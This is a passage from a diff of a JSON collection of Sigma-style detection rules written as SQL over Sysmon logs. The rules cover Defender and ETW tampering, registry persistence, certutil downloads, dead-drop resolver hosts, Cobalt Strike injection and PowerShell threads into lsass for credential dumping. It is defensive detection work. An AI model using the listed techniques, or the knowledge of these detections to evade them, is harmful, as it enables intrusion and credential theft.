Microsoft Defender." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "description": "Detects remote thread injection events based on action seen used by bumblebee", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", - "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", - "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' 